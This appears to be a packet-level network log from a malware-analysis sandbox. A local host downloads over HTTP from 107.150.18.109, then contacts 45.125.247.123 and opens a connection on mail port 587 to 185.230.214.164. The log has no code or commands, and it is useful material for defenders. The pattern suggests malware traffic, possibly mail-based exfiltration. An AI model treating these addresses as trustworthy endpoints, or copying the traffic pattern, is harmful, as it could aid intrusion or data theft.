                                              Sep 12, 2024 21:29:59.125947952 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.125960112 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.125971079 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.125989914 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.126000881 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.126012087 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.126038074 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.126038074 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.126085997 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.126085997 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.126183987 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.347731113 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.347901106 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.347907066 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.347922087 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348084927 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.348084927 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.348298073 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348311901 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348342896 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348376036 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348464012 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.348464012 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.348479986 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.348498106 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348526001 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348553896 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.348556995 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348732948 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.348787069 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348802090 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348813057 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.348984003 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.348984003 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349212885 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349277020 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349287987 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349298954 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349317074 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349328041 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349366903 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349387884 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349412918 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349428892 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349428892 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349492073 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349492073 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349507093 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349561930 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349577904 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349577904 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349706888 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349725962 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349777937 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.349872112 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.349966049 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.350244045 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.350269079 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.350281000 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.350305080 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.350317955 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.350328922 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.350409031 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.350409031 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.350424051 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.350424051 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.350424051 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.350502968 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.570746899 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.571006060 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.571080923 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.571285009 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.571611881 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.571633101 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.571846008 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.571901083 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.571918011 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572048903 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.572079897 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572093964 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572127104 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.572264910 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.572310925 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.572339058 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572355032 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572370052 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572384119 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572490931 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.572490931 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.572514057 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.572554111 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572562933 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.572587013 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572674036 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.572674036 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.572736979 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572750092 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.572920084 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.573498011 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573512077 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573546886 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573559999 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573571920 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573585033 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573597908 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573610067 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573622942 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573635101 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573647976 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.573647976 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.573697090 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.573746920 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573749065 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.573765039 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573777914 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573790073 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573793888 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.573893070 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.573893070 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.573893070 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.573939085 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.573940992 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574076891 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574098110 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574110985 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574208975 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574245930 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574245930 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574352026 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574353933 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574492931 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574707031 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574759960 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574773073 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574784994 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574798107 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574810982 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574822903 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574856997 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574856997 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574906111 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574906111 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574906111 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574907064 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574954987 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.574969053 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.574981928 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.575090885 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.575090885 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.575124979 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.575269938 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.575273991 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.575429916 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.575601101 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.575624943 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.575638056 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.575649977 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.575663090 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.575715065 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.575763941 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.575763941 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.575813055 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.575813055 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.576267958 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.576283932 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.576297998 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.576309919 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.576323032 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.576335907 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.576348066 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.576360941 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.576437950 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.576437950 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.576478958 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.576478958 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.794181108 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.794239998 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.794289112 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.794332981 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.794425011 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.794471979 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.794538021 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.794863939 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.795082092 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.795217991 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.795273066 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.795317888 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.795361042 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.795423031 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.795494080 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.795514107 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.795514107 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.795613050 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.795655966 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.795793056 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.795881987 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.796119928 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.796273947 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.796485901 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.796809912 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.796866894 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.796988010 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.797075033 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.797143936 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.797199011 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.797245026 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.797280073 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.797306061 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.797358036 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.797406912 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.797487974 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.797935009 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.797991037 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798034906 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798079967 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798121929 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798156977 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798156977 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798203945 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798254967 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798259974 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798312902 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798373938 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798373938 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798456907 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798475981 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798520088 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798638105 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798645973 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798645973 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798711061 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798754930 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.798777103 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798892975 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798892975 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.798976898 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.799021959 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.799113989 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.799149990 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.799165010 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.799210072 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.799253941 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.799298048 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.799308062 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.799308062 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.799366951 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.799406052 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.799468994 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.799474001 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.799515009 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.799539089 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.799582958 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.799648046 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.799724102 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.800468922 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.800527096 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.800570965 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.800614119 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.800626993 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.800669909 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.800702095 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.800719023 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.800762892 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.800770044 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.800821066 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.800842047 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.800883055 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.800920010 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.800942898 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.800968885 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801002026 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801045895 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801064968 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801064968 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801115990 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801163912 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801168919 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801168919 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801232100 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801259995 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801259995 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801300049 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801348925 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801388025 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801404953 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801436901 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801465988 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801486015 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801527023 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801572084 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801575899 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801625967 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801675081 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801723003 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801772118 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.801914930 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.801960945 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802002907 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802047014 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802064896 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.802108049 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802114964 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.802165985 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802211046 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802216053 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.802265882 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802285910 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.802285910 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.802335024 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802380085 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802388906 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.802437067 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802454948 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.802495956 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:29:59.802546978 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.802624941 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:29:59.802625895 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:30:00.017782927 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:30:00.018045902 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:30:00.026215076 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:30:00.026281118 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:30:00.026530981 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:30:00.026549101 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:30:00.026549101 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:30:00.026735067 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:30:00.188694954 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:30:00.188977003 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:30:00.241405964 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:30:00.241592884 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:30:00.249314070 CEST8049715107.150.18.109192.168.11.20
                                              Sep 12, 2024 21:30:00.249577045 CEST4971580192.168.11.20107.150.18.109
                                              Sep 12, 2024 21:30:03.449466944 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:30:03.761919022 CEST804971645.125.247.123192.168.11.20
                                              Sep 12, 2024 21:30:03.762223005 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:30:03.764331102 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:30:04.076491117 CEST804971645.125.247.123192.168.11.20
                                              Sep 12, 2024 21:30:04.076824903 CEST804971645.125.247.123192.168.11.20
                                              Sep 12, 2024 21:30:04.126948118 CEST4971680192.168.11.2045.125.247.123
                                              Sep 12, 2024 21:30:08.174609900 CEST49717587192.168.11.20185.230.214.164
                                              Sep 12, 2024 21:30:08.489015102 CEST58749717185.230.214.164192.168.11.20
